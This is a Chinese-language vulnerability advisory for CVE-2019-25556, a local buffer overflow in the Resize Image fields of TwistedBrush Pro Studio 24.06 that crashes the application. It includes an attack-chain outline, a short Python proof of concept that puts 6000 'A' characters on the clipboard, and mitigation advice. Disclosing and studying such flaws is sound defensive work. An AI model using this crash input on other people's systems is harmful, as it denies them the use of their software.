CVE-2019-25556 CVSS 6.2 中危

CVE-2019-25556 TwistedBrush Pro Studio拒绝服务漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25556

漏洞类型

缓冲区溢出

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

TwistedBrush Pro Studio

漏洞概述

TwistedBrush Pro Studio 24.06版本在图像调整大小功能中存在安全漏洞。由于软件未能正确处理用户输入的长度，本地攻击者可以通过向“新宽度”或“新高度”字段粘贴超长字符串来触发缓冲区溢出。该漏洞导致应用程序崩溃，造成拒绝服务，影响系统的可用性。

技术细节

该漏洞属于典型的本地缓冲区溢出。在TwistedBrush Pro Studio处理图像尺寸变更请求时，程序未对输入到宽度或高度字段的字符串长度进行有效的边界检查。攻击者无需任何权限或用户交互，即可在本地生成包含大量特定字符（如'A'）的恶意字符串。当该字符串被粘贴并提交给应用程序处理时，由于固定大小的栈缓冲区无法容纳过长的输入，多余数据将覆盖相邻的内存区域。这种内存破坏导致应用程序触发异常并终止，虽然当前主要表现为拒绝服务，但在某些情况下可能导致更严重的安全风险。

攻击链分析

STEP 1

访问系统

攻击者获得对运行TwistedBrush Pro Studio的本地系统的访问权限。

STEP 2

触发功能

攻击者打开应用程序并导航至Resize Image（调整图像大小）功能界面。

STEP 3

输入恶意数据

攻击者将预先生成的超长字符串粘贴到'New Width'（新宽度）或'New Height'（新高度）输入框中。

STEP 4

执行攻击

程序处理输入时发生缓冲区溢出，导致内存损坏并使应用程序崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import pyperclip

# PoC for CVE-2019-25556
# Description: Triggers a buffer overflow in TwistedBrush Pro Studio 24.06
# Instructions: Run this script, then paste the clipboard content into the 'New Width' or 'New Height' field.

# Generate a long buffer to trigger the crash
# The exact length may vary, but 5000+ characters is usually sufficient for GUI input fields
buffer = "A" * 6000

try:
    pyperclip.copy(buffer)
    print("[+] Malicious payload copied to clipboard.")
    print("[+] Paste it into the Resize Image input fields to trigger the DoS.")
except ImportError:
    print("Payload:")
    print(buffer)

影响范围

TwistedBrush Pro Studio 24.06

防御指南

临时缓解措施

建议用户立即升级到TwistedBrush Pro Studio的最新版本以修复此漏洞。如果无法升级，应限制对受影响工作站的访问，并避免在应用程序中输入来源不明的长文本数据。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表